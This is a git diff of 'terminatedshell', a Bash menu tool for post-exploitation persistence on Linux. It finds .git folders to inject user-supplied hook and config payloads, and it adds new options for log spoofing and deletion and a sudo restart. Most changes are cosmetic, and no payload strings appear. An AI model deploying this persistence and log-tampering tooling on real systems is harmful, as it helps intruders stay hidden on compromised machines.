Changes

diff --git a/functions/HOOKS b/functions/HOOKS
--- a/functions/HOOKS
+++ b/functions/HOOKS
@@ -16,7 +16,7 @@ case $hook_choice in
     echo -e "${RED}[*]${EOC} Searching for ${RED}.git${EOC} folders in ${RED}/home/${EOC} directories\n"    
     # --- Finding all .git folders of all users & storing them in an array ---
     mapfile -t git_folders < <(find /home/ -type d -name ".git") && \
-    echo -e "\n${RED}[+]${EOC} Found accessable ${RED}.git${EOC} folders for user ${RED}($USER)${EOC}:" # --- Display users founded .git folders ---
+    echo -e "\n${RED}[+]${EOC} Found accessable ${RED}.git${EOC} folders for user ${RED}${USER}${EOC}:" # --- Display users founded .git folders ---
     for ((n_folder=0; n_folder<${#git_folders[@]}; n_folder++)); do
         echo -e "$(line)$(line)"
         echo -e "${RED}[$((n_folder+1))]${EOC} - ${git_folders[$n_folder]}"
@@ -70,9 +70,9 @@ case $hook_choice in
                 echo -e "${RED}[x]${EOC} Payload cannot be empty\n"
             fi
     elif [[ "$git_choice" -eq 2 ]]; then
-        cd "$selected_folder" || { echo "${RED}[x]${EOC} $selected_folder is not accessible for user ($USER) "; hooks; }
+        cd "$selected_folder" || { echo "${RED}[x]${EOC} $selected_folder is not accessible for user ${USER} "; hooks; }
         if [[ -f $(pwd)/config ]] && [[ -w $(pwd)/config ]] && [[ -r $(pwd)/config ]]; then
-            echo -e "${RED}[+]${EOC} Git config file exits for current user ($USER) & have r/w premissions\n"
+            echo -e "${RED}[+]${EOC} Git config file exits for current user ${USER} & have r/w premissions\n"
             read -rp $'\033[0;91m[*]\e[0m Enter your custom payload > ' git_config_payload
             if [[ -n "$git_config_payload" ]]; then
                 git_config_content=$(cat "$(pwd)/config")
@@ -89,7 +89,7 @@ case $hook_choice in
                 echo -e "${RED}[x]${EOC} Payload cannot be empty\n" && hooks
             fi
         else
-            echo -e "${RED}[x]${EOC} Git config file not found or current user ($USER) don't have r/w premissions" && hooks    
+            echo -e "${RED}[x]${EOC} Git config file not found or current user ${USER} don't have r/w premissions" && hooks    
         fi;
         
     else
diff --git a/terminatedshell b/terminatedshell
--- a/terminatedshell
+++ b/terminatedshell
@@ -1,5 +1,13 @@
 #!/usr/bin/env bash
 
+# ──────────────────────────────────────────────────────────────────────────────────────────────
+# |   Author: https://github.com/anonimidin                                                    |
+# |   Repository: https://github.com/terminatedshell                                           |
+# |   Purpose: To learn basics methods of persistance after exploitation                       |
+# |   License: Apache 2.0 | Check ./LICENSE file or http://www.apache.org/licenses/LICENSE-2.0 |
+# |   How it works: Check general info about functions in ./README.md                          |
+# ──────────────────────────────────────────────────────────────────────────────────────────────
+
 # ----- Global script variables -----
 LC_ALL="en_US.UTF-8" 
 current_shell=$(grep "^$USER:" /etc/passwd | cut -d: -f7)
@@ -11,47 +19,49 @@ RED='\033[0;91m' # --- Light red ---
 ALERT='\033[1;5;91m' # --- Bold, Blinking & Red ---
 EOC='\033[0m' # --- End of the ANSI color ---
 
-
 line(){ 
      printf -- '────────%.0s' \ {1..5}
 }
 
 text_banner="
-\t${RED}    .--.${EOC}
-\t${RED}   |x x |   ╔╦╗${EOC}${BOLD}┌─┐┬─┐┌┬┐┬┌┐┌┌─┐┌┬┐┌─┐┌┬┐${EOC}${RED}╔═╗${EOC}${BOLD}┬ ┬┌─┐┬  ┬  ${EOC}
-\t${RED}   |\_/ |    ║ ${EOC}${BOLD}├┤ ├┬┘│││││││├─┤ │ ├┤  ││${EOC}${RED}╚═╗${EOC}${BOLD}├─┤├┤ │  │  ${EOC}
-\t${RED}  // x \ \   ╩ ${EOC}${BOLD}└─┘┴└─┴ ┴┴┘└┘┴ ┴ ┴ └─┘─┴┘${EOC}${RED}╚═╝${EOC}${BOLD}┴ ┴└─┘┴─┘┴─┘${EOC}
-\t${RED} (|  x  | )       Tool for persistence in linux${EOC}
-\t${RED}/'|_ x _/'\   ${ALERT}Use this script for educational purposes.${EOC}
-\t${RED}\___)=(___/${EOC}
-"
+ ${RED}    .--.${EOC}
+ ${RED}   |x x |   ╔╦╗${EOC}${BOLD}┌─┐┬─┐┌┬┐┬┌┐┌┌─┐┌┬┐┌─┐┌┬┐${EOC}${RED}╔═╗${EOC}${BOLD}┬ ┬┌─┐┬  ┬  ${EOC}
+ ${RED}   |\_/ |    ║ ${EOC}${BOLD}├┤ ├┬┘│││││││├─┤ │ ├┤  ││${EOC}${RED}╚═╗${EOC}${BOLD}├─┤├┤ │  │  ${EOC}
+ ${RED}  // x \ \   ╩ ${EOC}${BOLD}└─┘┴└─┴ ┴┴┘└┘┴ ┴ ┴ └─┘─┴┘${EOC}${RED}╚═╝${EOC}${BOLD}┴ ┴└─┘┴─┘┴─┘${EOC}
+ ${RED} (|  x  | )       Tool for persistence in linux${EOC}
+ ${RED}/'|_ x _/'\   ${ALERT}Use this script for educational purposes.${EOC}
+ ${RED}\___)=(___/${EOC} "
 
 options="
-\t${RED}[ - MAIN FUNCTIONS - ]${EOC}
-${RED}$(line)${EOC}
-${RED}[1]${EOC} ${BOLD}- Manage Users [View|Add|Delete]                      ${EOC}
-$(line)
-${RED}[2]${EOC} ${BOLD}- Shell Config [.bashrc|.zshrc]                       ${EOC}
-$(line)
-${RED}[3]${EOC} ${BOLD}- Scheduler [job|task]                                ${EOC}
-$(line)
-${RED}[4]${EOC} ${BOLD}- Hooks [Apt-get|Git]                                 ${EOC}
-$(line)
-${RED}[5]${EOC} ${BOLD}- Systemd                                             ${EOC}
-$(line)
-${RED}[6]${EOC} ${BOLD}- Message of the Day                                  ${EOC}
-$(line)
-${RED}[7]${EOC} ${BOLD}- Malicious Init                                      ${EOC}
-${RED}$(line)${EOC}
+\t\t\t${RED}[ - MAIN FUNCTIONS - ]${EOC}
+\t${RED}$(line)${EOC}
+\t${RED}[1]${EOC} ${BOLD}- Manage Users [view|add|delete]                      ${EOC}
+\t$(line)
+\t${RED}[2]${EOC} ${BOLD}- Shell Config [.bashrc|.zshrc]                       ${EOC}
+\t$(line)
+\t${RED}[3]${EOC} ${BOLD}- Scheduler [job|task]                                ${EOC}
+\t$(line)
+\t${RED}[4]${EOC} ${BOLD}- Hooks [apt-get|git]                                 ${EOC}
+\t$(line)
+\t${RED}[5]${EOC} ${BOLD}- Systemd                                             ${EOC}
+\t$(line)
+\t${RED}[6]${EOC} ${BOLD}- Message of the Day                                  ${EOC}
+\t$(line)
+\t${RED}[7]${EOC} ${BOLD}- Malicious Init                                      ${EOC}
+\t$(line)
+\t${RED}[8]${EOC} ${BOLD}- Log [spoof|delete|disable]                        ${EOC}
+\t${RED}$(line)${EOC}
 
-\t${RED}[ - OTHER FUNCTIONS - ]${EOC}
-${RED}$(line)${EOC}
-${RED}[ cls | clear ]${EOC} -${BOLD} Clear terminal                          ${EOC}
-$(line)
-${RED}[ ? | h | help ]${EOC} -${BOLD} Show options                           ${EOC}
-$(line)
-${RED}[ 0 | q | quit | exit ]${EOC} - ${BOLD}Exit                            ${EOC}
-${RED}$(line)${EOC}
+\t\t\t${RED}[ - OTHER FUNCTIONS - ]${EOC}
+\t${RED}$(line)${EOC}
+\t${RED}[ cls | clear ]${EOC} -${BOLD} Clear terminal                          ${EOC}
+\t$(line)
+\t${RED}[ ? | h | help ]${EOC} -${BOLD} Show options                           ${EOC}
+\t$(line)
+\t${RED}[ root ]${EOC} - ${BOLD}Restart with SU privileges                     ${EOC}
+\t$(line)
+\t${RED}[ 0 | q | quit | exit ]${EOC} - ${BOLD}Exit                            ${EOC}
+\t${RED}$(line)${EOC}
 "
 
 # --- Checks for privileges ---
@@ -103,7 +113,6 @@ sched_func(){
     fi;
 }
 
-
 # --- Hooks presistance [ Apt pre-invoke and Git pre-commit ] ---
 hooks_func(){
     if . functions/HOOKS; then
@@ -131,7 +140,7 @@ if [[ $priv_status == "is_su" ]]; then
         echo -e "\n${RED}[x]${EOC} ${BOLD}MOTD${EOC} function finished ${RED}UNSUCCESSFULLY${EOC}\n" && menu
     fi;
 else
-    echo -e "${RED}[x]${EOC} U cannot edit ${BOLD}MOTD${EOC} file without SU priveleges\n" && menu
+    echo -e "${RED}[x]${EOC} U cannot edit ${BOLD}MOTD${EOC} file without SU privileges\n" && menu
 fi
 }
 
@@ -144,13 +153,21 @@ if [[ "$priv_status" == "is_su" ]]; then
         echo -e "\n${RED}[x]${EOC} ${BOLD}MALINT${EOC} function finished ${RED}UNSUCCESSFULLY${EOC}\n" menu
     fi
 else
-    echo -e "${RED}[x]${EOC} U need SU priveleges to add malicious init\n" && menu
+    echo -e "${RED}[x]${EOC} U need SU privileges to add malicious init\n" && menu
     fi
 }
- 
-closing()
-{ 
-    echo -e "\n\n${RED}[+]${EOC} Closing program...\n" && \
+
+# --- Logs [ spoof | delete & disable ] ---
+logs_func(){
+    if . /functions/LOGS; then
+        echo -e "\n${RED}[+]${EOC} ${BOLD}LOGS${EOC} function finished ${RED}SUCCESSFULLY${EOC}\n" && menu
+    else
+        echo -e "\n${RED}[x]${EOC} ${BOLD}LOGS${EOC} function finished ${RED}UNSUCCESSFULLY${EOC}\n" && menu
+    fi
+}
+
+closing(){ 
+    echo -e "\n\n${RED}[+]${EOC} Closing program..." && \
     echo -e "\n${RED}[!]${EOC} ${BOLD}Don't forget to check git repo${EOC} (${RED}https://github.com/anonimidin/terminatedshell${EOC})" && \
     sleep 0.3 && exit 0;
 }
@@ -166,46 +183,62 @@ if (( $(tput cols) < 155 )); then
 fi;
 }
 
-# ----- MAIN -----
-
-# --- Check for privileges --- 
-priv_check
-banner
-# -- Menu --- 
+# ----- Menu Function -----
 menu(){
 # --- Options ---
 read -rp $'\033[0;91m[*] [TERMINATED_SHELL] >\e[0m ' choice
     # --- Wait for choice from user ---
     case $choice in
     
-    1) sleep 0.5 && echo && manage_users;; # --- line 74  ---
-    2) sleep 0.5 && echo && shell_func;;   # --- line 83  ---
-    3) sleep 0.5 && echo && sched_func;;   # --- line 92  ---
-    4) sleep 0.5 && echo && hooks_func;;   # --- line 102 ---
-    5) sleep 0.5 && echo && systemd_func;; # --- line 111 ---
-    6) sleep 0.5 && echo && motd_func;;    # --- line 120 ---
-    7) sleep 0.5 && echo && malint_func;;  # --- line 133 ---
-  # 8) sleep 0.5 && echo && logs;; ${RED}[8]${EOC} ${BOLD}- SOON Logs [spoof\delete]${EOC} 
-    
+    1) sleep 0.5 && echo && manage_users;;
+    2) sleep 0.5 && echo && shell_func;;
+    3) sleep 0.5 && echo && sched_func;;
+    4) sleep 0.5 && echo && hooks_func;;
+    5) sleep 0.5 && echo && systemd_func;;
+    6) sleep 0.5 && echo && motd_func;;
+    7) sleep 0.5 && echo && malint_func;;
+    8) sleep 0.5 && echo && logs_func;;
+    # 10) sleep 0.5 && echo && ;;
+
     0 | [Qq] | [Qq][Uu][Ii][Tt] | [Ee][Xx][Ii][Tt]) # --- About repo & exit ---
-    if command -v open > /dev/null; then 
-        echo -e "\n${RED}[!]${EOC} ${RED}Help us to improve & spread this script${EOC}\n" && \
-        sleep 1.5 && open https://github.com/anonimidin/terminatedshell;
-    else
-        sleep 0.5
-        echo -e "${RED}[!]${EOC} ${RED}Help us to improve & spread this script (https://github.com/anonimidin/terminatedshell)${EOC}\n"
-    fi;;
+        if command -v open > /dev/null; then 
+            echo -e "\n${RED}[!]${EOC} ${RED}Help us to improve & spread this script${EOC}\n" && \
+            sleep 1.5 && open https://github.com/anonimidin/terminatedshell &> /dev/null && \
+            echo "${RED}[*]${EOC} Redicated to ${RED}project github page${EOC}" && exit 0 || { echo -e "${RED}[x]${EOC} Failed to open github project in your ${RED}default browser${EOC}"; };
+        else
+            sleep 0.5
+            echo -e "${RED}[!]${EOC} ${RED}Help us to improve & spread this script (https://github.com/anonimidin/terminatedshell)${EOC}\n"
+        fi;;
 
     "?" | [Hh] | [Hh][Ee][Ll][Pp]) # --- Show option based menu ---
-    sleep 0.5 && echo -e "$options" && menu;;
+        sleep 0.5 && echo -e "$options" && menu;;
 
     [Cc][Ll][Ss]|[Cc][Ll][Ee][Aa][Rr]) # --- Clear terminal --- 
-    (clear) && menu ;;
+        sleep 0.3 && (clear) && menu ;;
     
-    # [Nn][Ee][Ee][Dd][_][Ss][Uu]) --- I'll add command to activate SU priveleges in current sesstion ---
+    [Rr][Oo][Oo][Tt])
+        sleep 1; clear && \
+        echo -e "${RED}[*]${EOC} Restarting script with ${RED}SU privileges${EOC}..." && \
+        exec sudo -s $current_shell "$0"; ;;
 
     *) echo -e "\n${RED}[!]${EOC} ${BOLD}Choose correct option.${EOC}\n" && menu;;
     esac
 }
-menu
-# --- EOF ---
+
+# ----- MAIN -----
+if (( $1 )) ; then
+    echo -e "\n${RED}[!] This script doesn't require any arguments${EOC}" && \
+    exit 1;
+else
+    priv_check || { 
+        echo -e "${RED}[x]${EOC} Failed to check ${RED}privilege${EOC} of current user ${RED}${USER}${EOC}" && \
+        exit 1; 
+    }
+    banner || { 
+        echo -e "${RED}[x]${EOC} Failed to display ${RED}banner${EOC}\n";
+    }
+    menu || { 
+        echo -e "${RED}[x]${EOC} Failed to start ${RED}menu${EOC}" && \
+        exit 1; 
+    }
+fi;
